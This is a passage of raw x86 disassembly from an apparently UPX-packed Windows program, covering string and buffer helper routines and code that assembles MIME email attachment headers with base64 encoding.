loc_411D8C: ; CODE XREF: sub_411CF0+80�j
mov byte ptr [eax+100h], 0
loc_411D93: ; CODE XREF: sub_411CF0+9A�j
push 0
lea esi, [ebp+28BCh]
push eax
mov ecx, esi
call sub_410740
mov ecx, [ebp+28D8h]
inc ecx
mov eax, ecx
cmp eax, 1388h
mov [ebp+28D8h], ecx
jle short loc_411DCC
push 0
mov ecx, esi
call sub_410EC0
test eax, eax
jz short loc_411DCC
dec dword ptr [ebp+28D8h]
loc_411DCC: ; CODE XREF: sub_411CF0+C7�j
; sub_411CF0+D4�j
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
retn 0Ch
sub_411CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DE0 proc near ; CODE XREF: sub_407640+55A�p
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_411DE0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 208h
mov eax, dword_42A290
push ebx
push esi
mov esi, [ebp+arg_4]
test esi, esi
push edi
mov [ebp+var_14], eax
mov [ebp+var_10], esp
jz short loc_411E3C
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_411E3C
mov edi, [ebp+arg_8]
mov eax, [ebp+arg_C]
mov byte ptr [edi], 0
mov byte ptr [eax], 0
mov al, [esi]
test al, al
mov edx, esi
jz short loc_411E57
mov edi, edi
loc_411E30: ; CODE XREF: sub_411DE0+5A�j
cmp al, 40h
jz short loc_411E57
mov al, [edx+1]
inc edx
test al, al
jnz short loc_411E30
loc_411E3C: ; CODE XREF: sub_411DE0+31�j
; sub_411DE0+38�j ...
xor eax, eax
loc_411E3E: ; CODE XREF: sub_411DE0+FE�j
; sub_411DE0+13C�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_411E57: ; CODE XREF: sub_411DE0+4C�j
; sub_411DE0+52�j
cmp byte ptr [edx], 0
jz short loc_411E3C
mov eax, edx
sub eax, esi
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, [ebp+arg_8]
inc edx
lea esi, [ebp+var_214]
mov byte ptr [eax+ecx], 0
mov eax, edx
sub esi, edx
loc_411E82: ; CODE XREF: sub_411DE0+AA�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_411E82
mov esi, [ebp+arg_C]
mov eax, edx
sub esi, edx
loc_411E93: ; CODE XREF: sub_411DE0+BB�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_411E93
mov ecx, [ebp+arg_0]
xor esi, esi
test ecx, ecx
mov [ebp+arg_4], esi
mov [ebp+var_4], esi
jz short loc_411EE3
lea edx, [ebp+var_114]
push edx
lea eax, [ebp+var_214]
push eax
push esi
call sub_411CF0
test eax, eax
jz short loc_411F2A
mov edx, [ebp+arg_10]
lea ecx, [ebp+var_114]
mov esi, 1
loc_411ED2: ; CODE XREF: sub_411DE0+FA�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_411ED2
mov eax, esi
jmp loc_411E3E
; ---------------------------------------------------------------------------
loc_411EE3: ; CODE XREF: sub_411DE0+CA�j
lea ecx, [ebp+var_114]
push ecx
lea edx, [ebp+var_214]
push edx
push 0
call sub_411AF0
add esp, 0Ch
test eax, eax
jz short loc_411F2A
mov edx, [ebp+arg_10]
lea ecx, [ebp+var_114]
mov esi, 1
lea ecx, [ecx+0]
loc_411F10: ; CODE XREF: sub_411DE0+138�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_411F10
mov eax, esi
jmp loc_411E3E
; ---------------------------------------------------------------------------
loc_411F21: ; DATA XREF: UPX0:00426A70�o
mov eax, offset loc_411F27
retn
; ---------------------------------------------------------------------------
loc_411F27: ; DATA XREF: sub_411DE0:loc_411F21�o
mov esi, [ebp+arg_4]
loc_411F2A: ; CODE XREF: sub_411DE0+E2�j
; sub_411DE0+11D�j
mov eax, esi
jmp loc_411E3E
sub_411DE0 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F32 proc near ; CODE XREF: sub_414280+28�p
; sub_415CE0+D1�p ...
jmp dword_42427C
sub_411F32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F38 proc near ; CODE XREF: sub_414280+1E�p
; sub_4163B0+A�p
jmp dword_424278
sub_411F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F3E proc near ; CODE XREF: sub_4160F0+91�p
jmp dword_424274
sub_411F3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F44 proc near ; CODE XREF: sub_415F90+53�p
; sub_4160F0+5E�p
jmp dword_424270
sub_411F44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F4A proc near ; CODE XREF: sub_4164B0+13�p
; sub_4164F0+6E�p
jmp dword_42426C
sub_411F4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F50 proc near ; CODE XREF: sub_415CE0+16A�p
jmp dword_424268
sub_411F50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F56 proc near ; CODE XREF: sub_415CE0+80�p
jmp dword_424264
sub_411F56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F5C proc near ; CODE XREF: sub_415CE0+11C�p
jmp dword_424260
sub_411F5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F62 proc near ; CODE XREF: sub_415F90+9A�p
jmp dword_42425C
sub_411F62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F68 proc near ; CODE XREF: sub_415CE0+14F�p
jmp dword_424254
sub_411F68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F6E proc near ; CODE XREF: sub_415CE0+B0�p
; sub_416350+6�p
jmp dword_42424C
sub_411F6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_411F74 proc near ; CODE XREF: sub_415CE0+199�p
; sub_415CE0:loc_415F3C�p ...
jmp dword_424240
sub_411F74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411F80 proc near ; CODE XREF: sub_414690+825�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov cl, [eax]
test cl, cl
push edi
mov edi, eax
jz short loc_411FAB
push esi
mov esi, dword_4241F0
loc_411F94: ; CODE XREF: sub_411F80+28�j
cmp cl, 3Ah
jz short loc_411F9E
cmp cl, 5Ch
jnz short loc_411FA1
loc_411F9E: ; CODE XREF: sub_411F80+17�j
lea edi, [eax+1]
loc_411FA1: ; CODE XREF: sub_411F80+1C�j
push eax
call esi ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_411F94
pop esi
loc_411FAB: ; CODE XREF: sub_411F80+B�j
mov eax, edi
pop edi
retn
sub_411F80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411FB0 proc near ; CODE XREF: sub_413B10+7F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
mov esi, ecx
call dword_424094 ; lstrlen
mov [esi+4], eax
inc eax
push eax
mov [esi+8], eax
call sub_4191C1
add esp, 4
mov ecx, edi
pop edi
mov [esi], eax
mov edx, eax
pop esi
loc_411FD7: ; CODE XREF: sub_411FB0+2F�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_411FD7
retn 4
sub_411FB0 endp
; ---------------------------------------------------------------------------
align 10h
loc_411FF0: ; CODE XREF: UPX0:00423346�j
; UPX0:00423351�j ...
mov eax, [ecx]
test eax, eax
jz short locret_411FFD
push eax
call sub_41930D
pop ecx
locret_411FFD: ; CODE XREF: UPX0:00411FF4�j
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412000 proc near ; CODE XREF: sub_412060+13�p
; sub_4120B0+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov ebx, ecx
cmp eax, [ebx+8]
jbe short loc_412051
push ebp
add eax, 1FFFh
and eax, 0FFFFE000h
push esi
push eax
mov [ebx+8], eax
call sub_4191C1
mov esi, [ebx]
add esp, 4
test esi, esi
mov ebp, eax
jz short loc_41204D
mov ecx, [ebx+4]
inc ecx
mov eax, ecx
shr ecx, 2
push edi
mov edi, ebp
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebx]
push ecx
call sub_41930D
add esp, 4
pop edi
loc_41204D: ; CODE XREF: sub_412000+2A�j
pop esi
mov [ebx], ebp
pop ebp
loc_412051: ; CODE XREF: sub_412000+A�j
pop ebx
retn 4
sub_412000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412060 proc near ; CODE XREF: sub_415460+180�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
mov ebx, ecx
mov ebp, [ebx+4]
add ebp, esi
push edi
lea eax, [ebp+1]
push eax
call sub_412000
mov edx, [ebx+4]
mov edi, [ebx]
mov ecx, esi
mov esi, [esp+10h+arg_0]
add edi, edx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebx]
pop edi
mov byte ptr [eax+ebp], 0
pop esi
mov [ebx+4], ebp
pop ebp
pop ebx
retn 8
sub_412060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4120B0 proc near ; CODE XREF: sub_412210+185�p
; sub_412210+190�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
push esi
mov ebx, ecx
call dword_424094 ; lstrlen
mov ebp, [ebx+4]
mov edi, eax
add ebp, edi
lea eax, [ebp+1]
push eax
mov ecx, ebx
call sub_412000
mov edx, [ebx+4]
mov ecx, edi
mov edi, [ebx]
add edi, edx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebx]
pop edi
mov byte ptr [eax+ebp], 0
pop esi
mov [ebx+4], ebp
pop ebp
pop ebx
retn 4
sub_4120B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412100 proc near ; CODE XREF: sub_412210+55�p
mov eax, dword_430530
push esi
xor esi, esi
cmp eax, esi
mov dword_430534, esi
jz short loc_412127
push eax
call sub_41930D
add esp, 4
mov dword_430530, esi
mov dword_430538, esi
loc_412127: ; CODE XREF: sub_412100+10�j
mov eax, dword_430524
cmp eax, esi
mov dword_430528, esi
jz short loc_41214B
push eax
call sub_41930D
add esp, 4
mov dword_430524, esi
mov dword_43052C, esi
loc_41214B: ; CODE XREF: sub_412100+34�j
mov eax, dword_430518
cmp eax, esi
mov dword_43051C, esi
jz short loc_41216F
push eax
call sub_41930D
add esp, 4
mov dword_430518, esi
mov dword_430520, esi
loc_41216F: ; CODE XREF: sub_412100+58�j
mov eax, dword_43050C
cmp eax, esi
mov dword_430510, esi
jz short loc_412193
push eax
call sub_41930D
add esp, 4
mov dword_43050C, esi
mov dword_430514, esi
loc_412193: ; CODE XREF: sub_412100+7C�j
mov eax, dword_43053C
cmp eax, esi
mov dword_430540, esi
jz short loc_4121B7
push eax
call sub_41930D
add esp, 4
mov dword_43053C, esi
mov dword_430544, esi
loc_4121B7: ; CODE XREF: sub_412100+A0�j
mov eax, dword_430500
cmp eax, esi
mov dword_430504, esi
jz short loc_4121DB
push eax
call sub_41930D
add esp, 4
mov dword_430500, esi
mov dword_430508, esi
loc_4121DB: ; CODE XREF: sub_412100+C4�j
mov eax, dword_4304F4
cmp eax, esi
mov dword_4304F8, esi
jz short loc_4121FF
push eax
call sub_41930D
add esp, 4
mov dword_4304F4, esi
mov dword_4304FC, esi
loc_4121FF: ; CODE XREF: sub_412100+E8�j
pop esi
retn
sub_412100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412210 proc near ; CODE XREF: sub_407640+2F3�p
; sub_407640+4A3�p ...
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_53C = dword ptr -53Ch
var_538 = dword ptr -538h
var_534 = byte ptr -534h
var_4B4 = byte ptr -4B4h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 554h
mov eax, dword_42A290
push ebx
push ebp
mov ebp, [esp+55Ch+arg_0]
xor ebx, ebx
cmp ebp, ebx
mov [esp+55Ch+var_4], eax
jnz short loc_41224B
pop ebp
mov eax, 1
pop ebx
mov ecx, [esp+554h+var_4]
call sub_4192B6
add esp, 554h
retn
; ---------------------------------------------------------------------------
loc_41224B: ; CODE XREF: sub_412210+1F�j
push esi
push edi
mov [esp+564h+var_540], ebx
mov [esp+564h+var_53C], ebx
mov [esp+564h+var_538], ebx
mov [esp+564h+var_54C], ebx
mov [esp+564h+var_548], ebx
mov [esp+564h+var_544], ebx
call sub_412100
xor eax, eax
mov ecx, 10h
mov edi, offset byte_42AEA8
rep stosd
mov ecx, 1050h
mov edi, offset dword_42C290
rep stosd
mov eax, off_429FD0
mov edx, offset dword_42BD80
mov byte_430AC0, bl
mov dword_42B844, ebx
mov byte_430AB8, bl
mov dword_430AAC, ebx
mov dword_42BD74, ebx
mov byte_430AB6, bl
mov byte_430ABA, bl
mov byte_430ABB, bl
mov dword_430694, ebx
mov byte_42B238, bl
mov byte_430AC1, bl
mov byte_430AB4, bl
mov byte_430AB7, bl
mov dword_42B848, ebx
sub edx, eax
loc_4122E4: ; CODE XREF: sub_412210+DC�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_4122E4
push ebp
mov ecx, offset dword_4304F4
mov word_42B638, 31h
mov dword_42BD74, ebx
mov byte_4304ED, bl
mov byte_42BE81, bl
mov byte_42AFF1, bl
mov byte_4303D0, bl
mov byte_42AEE9, bl
mov byte_42B230, bl
mov byte_42AEE8, bl
mov dword_42B0FC, ebx
mov byte_42AEEA, 1
mov byte_42BD78, 1
mov dword_42BA5C, ebx
mov byte_4303D8, bl
mov byte_42BB68, bl
mov byte_42BE88, bl
mov byte_42BA60, bl
mov byte_42BC70, bl
mov byte_42B128, bl
mov byte_42AEF0, bl
mov byte_42B850, bl
mov byte_42B958, bl
mov byte_4306A8, bl
mov byte_42B238, bl
mov byte_42AFF8, bl
mov byte_42B740, bl
call sub_4120B0
push ebp
mov ecx, offset dword_430500
call sub_4120B0
lea eax, [ebp+314h]
mov edx, offset byte_42B740
sub edx, eax
loc_4123B2: ; CODE XREF: sub_412210+1AA�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_4123B2
lea eax, [ebp+30Ch]
mov edx, offset dword_42BD80
sub edx, eax
lea esp, [esp+0]
loc_4123D0: ; CODE XREF: sub_412210+1C8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_4123D0
lea eax, [ebp+840h]
mov edx, offset byte_42BB68
sub edx, eax
loc_4123E7: ; CODE XREF: sub_412210+1DF�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_4123E7
lea eax, [ebp+830h]
mov edx, offset word_42B638
sub edx, eax
mov edi, edi
loc_412400: ; CODE XREF: sub_412210+1F8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_412400
lea esi, [ebp+418h]
mov edx, offset byte_42B958
mov eax, esi
sub edx, esi
lea esp, [esp+0]
loc_412420: ; CODE XREF: sub_412210+218�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_412420
mov edx, offset byte_42B850
mov eax, esi
sub edx, esi
loc_412433: ; CODE XREF: sub_412210+22B�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
cmp cl, bl
jnz short loc_412433
lea eax, [ebp+620h]
mov edx, offset byte_42AEF0
sub edx, eax
lea ebx, [ebx+0]
loc_412450: ; CODE XREF: sub_412210+248�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
cmp cl, bl
jnz short loc_412450
lea eax, [ebp+51Ch]
mov edx, offset byte_42B128
sub edx, eax
loc_412467: ; CODE XREF: sub_412210+25F�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
cmp cl, bl
jnz short loc_412467
lea eax, [ebp+724h]
mov edx, offset byte_42BC70
sub edx, eax
mov edi, edi
loc_412480: ; CODE XREF: sub_412210+278�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
cmp cl, bl
jnz short loc_412480
lea eax, [ebp+104h]
mov edx, offset byte_42BE88
sub edx, eax
loc_412497: ; CODE XREF: sub_412210+28F�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
cmp cl, bl
jnz short loc_412497
lea eax, [ebp+208h]
mov edi, offset byte_4243C3
mov esi, eax
mov ecx, 1
xor edx, edx
repe cmpsb
jz short loc_4124FA
mov edx, offset dword_42C290
mov dword_42B0FC, 1
sub edx, eax
lea ebx, [ebx+0]
loc_4124D0: ; CODE XREF: sub_412210+2C8�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
cmp cl, bl
jnz short loc_4124D0
cmp [ebp+82Ch], ebx
mov byte_42AEA9, bl
jz short loc_4124F1
mov byte_42AEA8, 1
jmp short loc_41250C
; ---------------------------------------------------------------------------
loc_4124F1: ; CODE XREF: sub_412210+2D6�j
mov byte_42AEA8, 2
jmp short loc_41250C
; ---------------------------------------------------------------------------
loc_4124FA: ; CODE XREF: sub_412210+2A7�j
mov dword_42B0FC, ebx
mov byte_42AEA8, bl
mov byte_42AEA9, bl
loc_41250C: ; CODE XREF: sub_412210+2DF�j
; sub_412210+2E8�j
cmp [ebp+828h], ebx
jz short loc_41252C
mov eax, dword_4245F8
mov cl, byte_4245FC
mov dword_4304DC, eax
mov byte ptr word_4304E0, cl
jmp short loc_412544
; ---------------------------------------------------------------------------
loc_41252C: ; CODE XREF: sub_412210+302�j
mov edx, dword_4245F0
mov ax, word_4245F4
mov dword_4304DC, edx
mov word_4304E0, ax
loc_412544: ; CODE XREF: sub_412210+31A�j
cmp dword_430538, ebx
mov dword_430534, ebx
jz short loc_41255A
mov ecx, dword_430530
mov [ecx], bl
loc_41255A: ; CODE XREF: sub_412210+340�j
mov edx, [ebp+8C0h]
mov eax, [edx+0Ch]
cmp eax, ebx
jbe short loc_4125C2
inc eax
push eax
mov ecx, offset dword_430530
call sub_412000
mov eax, [ebp+8C0h]
mov ecx, [eax+0Ch]
mov edx, dword_430530
push ecx
push edx
push eax
call sub_4045F0
mov eax, [ebp+8C0h]
mov eax, [eax+0Ch]
mov ecx, dword_430538
add esp, 0Ch
cmp eax, ecx
jnb short loc_4125A5
mov dword_430534, eax
loc_4125A5: ; CODE XREF: sub_412210+38E�j
mov ecx, dword_430530
mov edx, dword_430534
mov [edx+ecx], bl
mov eax, [ebp+8C0h]
mov esi, [eax+0Ch]
jmp loc_41267E
; ---------------------------------------------------------------------------
loc_4125C2: ; CODE XREF: sub_412210+355�j
mov eax, dword_430530
cmp eax, ebx
mov [esp+564h+var_550], 1
jz short loc_412642
cmp dword_430538, ebx
mov dword_430534, ebx
jz short loc_4125E3
mov [eax], bl
loc_4125E3: ; CODE XREF: sub_412210+3CF�j
push offset word_424544
call dword_424094 ; lstrlen
mov ecx, dword_430534
mov esi, eax
lea ebp, [ecx+esi]
lea edx, [ebp+1]
push edx
mov ecx, offset dword_430530
call sub_412000
mov eax, dword_430530
mov edx, dword_430534
mov ecx, esi
lea edi, [edx+eax]
mov eax, ecx
shr ecx, 2
mov esi, offset word_424544
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, dword_430530
mov [ecx+ebp], bl
mov dword_430534, ebp
mov ebp, [esp+564h+arg_0]
jmp short loc_41267A
; ---------------------------------------------------------------------------
loc_412642: ; CODE XREF: sub_412210+3C1�j
push offset word_424544
call dword_424094 ; lstrlen
mov dword_430534, eax
inc eax
push eax
mov dword_430538, eax
call sub_4191C1
add esp, 4
mov dword_430530, eax
mov ecx, offset word_424544
mov edx, eax
lea ecx, [ecx+0]
loc_412670: ; CODE XREF: sub_412210+468�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_412670
loc_41267A: ; CODE XREF: sub_412210+430�j
mov esi, [esp+564h+var_550]
loc_41267E: ; CODE XREF: sub_412210+3AD�j
cmp dword_42B0FC, ebx
mov edx, [esp+564h+arg_0]
mov ebp, [ebp+8C0h]
mov edi, [edx+8C4h]
mov [esp+564h+var_554], ebx
jz short loc_4126B2
mov eax, [edi+0Ch]
inc eax
push eax
lea ecx, [esp+568h+var_554]
push esi
push ecx
call sub_4127A0
add esp, 0Ch
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126B2: ; CODE XREF: sub_412210+48B�j
mov [esp+564h+var_554], esi
xor eax, eax
loc_4126B8: ; CODE XREF: sub_412210+4A0�j
mov edx, [esp+564h+var_554]
push edi
push ebp
push edx
push eax
lea eax, [esp+574h+var_4B4]
push eax
lea ecx, [esp+578h+var_534]
push ecx
lea edx, [esp+57Ch+var_54C]
push edx
lea eax, [esp+580h+var_540]
push eax
push esi
call sub_413410
add esp, 24h
mov esi, eax
call sub_412760
mov eax, [esp+564h+var_54C]
cmp eax, ebx
jz short loc_4126F8
push eax
call sub_41930D
add esp, 4
loc_4126F8: ; CODE XREF: sub_412210+4DD�j
mov eax, [esp+564h+var_540]
cmp eax, ebx
jz short loc_412709
push eax
call sub_41930D
add esp, 4
loc_412709: ; CODE XREF: sub_412210+4EE�j
mov ecx, [esp+564h+var_4]
pop edi
mov eax, esi
pop esi
pop ebp
pop ebx
call sub_4192B6
add esp, 554h
retn
sub_412210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412730 proc near ; CODE XREF: sub_412730+C�p
; sub_412760+A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
test eax, eax
jz short loc_41275D
push eax
call sub_412730
mov eax, [esi]
mov ecx, [eax+4]
push ecx
call sub_419DDD
mov edx, [esi]
push edx
call sub_419DDD
add esp, 0Ch
mov dword ptr [esi], 0
loc_41275D: ; CODE XREF: sub_412730+9�j
pop esi
retn
sub_412730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412760 proc near ; CODE XREF: sub_412210+4D2�p
mov eax, dword_430548
test eax, eax
jz short locret_412796
push eax
call sub_412730
mov eax, dword_430548
mov ecx, [eax+4]
push ecx
call sub_419DDD
mov edx, dword_430548
push edx
call sub_419DDD
add esp, 0Ch
mov dword_430548, 0
locret_412796: ; CODE XREF: sub_412760+7�j
retn
sub_412760 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4127A0 proc near ; CODE XREF: sub_412210+498�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
push edi
mov dword_430548, 0
push 10h
mov [ebp+0], eax
call sub_419DCB
mov dword_430548, eax
push 100h
mov ebx, eax
mov dword ptr [eax], 0
call sub_419DCB
mov [ebx+4], eax
mov edi, eax
mov eax, [esp+18h+arg_8]
mov ecx, 40h
mov esi, offset dword_42C290
rep movsd
movsx ecx, byte_42AEA8
add esp, 8
mov [ebx+8], ecx
mov [ebx+0Ch], eax
mov ecx, [ebp+0]
pop edi
add ecx, eax
pop esi
mov [ebp+0], ecx
pop ebp
mov eax, 1
pop ebx
retn
sub_4127A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412810 proc near ; CODE XREF: sub_413410+24B�p
; sub_414370+2CE�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push ebp
push esi
mov esi, [eax]
push edi
mov edi, [eax+4]
mov ebx, ecx
mov ebp, [ebx+4]
add ebp, edi
lea eax, [ebp+1]
push eax
call sub_412000
mov edx, [ebx]
mov ecx, edi
mov edi, [ebx+4]
add edi, edx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebx]
pop edi
mov byte ptr [eax+ebp], 0
pop esi
mov [ebx+4], ebp
pop ebp
pop ebx
retn 4
sub_412810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412860 proc near ; CODE XREF: sub_413410+1D0�p
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = byte ptr -410h
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_1C = dword ptr 20h
arg_20 = dword ptr 24h
arg_24 = dword ptr 28h
push 0FFFFFFFFh
push offset SEH_412860
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 438h
mov eax, dword_42A290
push ebx
push ebp
push esi
xor esi, esi
xor ebx, ebx
xor ebp, ebp
mov [esp+450h+var_10], eax
mov [esp+450h+var_444], ebx
mov [esp+450h+var_440], ebp
mov [esp+450h+var_43C], esi
mov [esp+450h+var_4], esi
mov [esp+450h+var_434], esi
mov [esp+450h+var_430], esi
mov [esp+450h+var_42C], esi
mov ecx, [esp+450h+arg_1C]
cmp ecx, esi
mov eax, dword_430548
mov byte ptr [esp+450h+var_4], 1
mov edx, ecx
jz short loc_4128DB
lea esp, [esp+0]
loc_4128D0: ; CODE XREF: sub_412860+79�j
mov ecx, [eax]
cmp ecx, esi
jz short loc_4128DB
dec edx
mov eax, ecx
jnz short loc_4128D0
loc_4128DB: ; CODE XREF: sub_412860+67�j
; sub_412860+74�j
mov ecx, [eax+0Ch]
push edi
mov edi, [eax+4]
mov eax, [eax+8]
mov [esp+454h+var_438], eax
cmp [esp+454h+arg_C], esi
mov [esp+454h+var_428], ecx
jnz loc_412BC2
mov ecx, [esp+454h+arg_0]
mov edx, [ecx]
mov eax, [ecx+4]
mov ebx, dword_424094
lea eax, [edx+eax-3]
cmp byte ptr [eax+2], 0Ah
mov [esp+454h+var_414], eax
jz short loc_41295C
push offset word_42465C
call sub_4120B0
push offset word_42465C
call ebx ; lstrlen
mov ebp, eax
lea eax, [ebp+1]
push eax
mov [esp+458h+var_440], ebp
mov [esp+458h+var_43C], eax
call sub_4191C1
mov ecx, offset word_42465C
mov edx, eax
add esp, 4
mov [esp+454h+var_444], eax
sub edx, ecx
mov edi, edi
loc_412950: ; CODE XREF: sub_412860+F8�j
mov al, [ecx]
mov [edx+ecx], al
inc ecx
test al, al
jnz short loc_412950
jmp short loc_41299A
; ---------------------------------------------------------------------------
loc_41295C: ; CODE XREF: sub_412860+B8�j
cmp byte ptr [eax], 0Ah
jz short loc_41299A
push offset word_42465C
call ebx ; lstrlen
mov ebp, eax
lea eax, [ebp+1]
push eax
mov [esp+458h+var_440], ebp
mov [esp+458h+var_43C], eax
call sub_4191C1
mov ecx, offset word_42465C
mov edx, eax
add esp, 4
mov [esp+454h+var_444], eax
sub edx, ecx
jmp short loc_412990
; ---------------------------------------------------------------------------
align 10h
loc_412990: ; CODE XREF: sub_412860+12B�j
; sub_412860+138�j
mov al, [ecx]
mov [edx+ecx], al
inc ecx
test al, al
jnz short loc_412990
loc_41299A: ; CODE XREF: sub_412860+FA�j
; sub_412860+FF�j
mov [esp+454h+var_424], esi
mov [esp+454h+var_420], esi
mov [esp+454h+var_41C], esi
push 16h
lea ecx, [esp+458h+var_424]
push ecx
push edi
mov byte ptr [esp+460h+var_4], 2
call sub_414370
mov eax, [esp+460h+var_438]
add esp, 0Ch
cmp eax, 2
jnz short loc_412A07
push edi
push esi
lea edx, [esp+45Ch+var_210]
push esi
push edx
call sub_415AE0
mov eax, [esp+464h+var_424]
push eax
lea ecx, [esp+468h+var_410]
push offset aContentDisposi ; "Content-Disposition: ATTACHMENT;\r\n file"...
push ecx
call sub_419B8A
lea edi, [esp+470h+var_410]
add esp, 1Ch
dec edi
loc_4129F3: ; CODE XREF: sub_412860+199�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4129F3
mov ecx, 9
mov esi, offset aContentTransfe ; "Content-Transfer-Encoding: BASE64\r\n"
rep movsd
loc_412A07: ; CODE XREF: sub_412860+165�j
push offset dword_424600
call ebx ; lstrlen
mov esi, eax
add ebp, esi
lea edx, [ebp+1]
push edx
lea ecx, [esp+458h+var_444]
call sub_412000
mov eax, [esp+454h+var_444]
mov edx, [esp+454h+var_440]
mov ecx, esi
lea edi, [edx+eax]
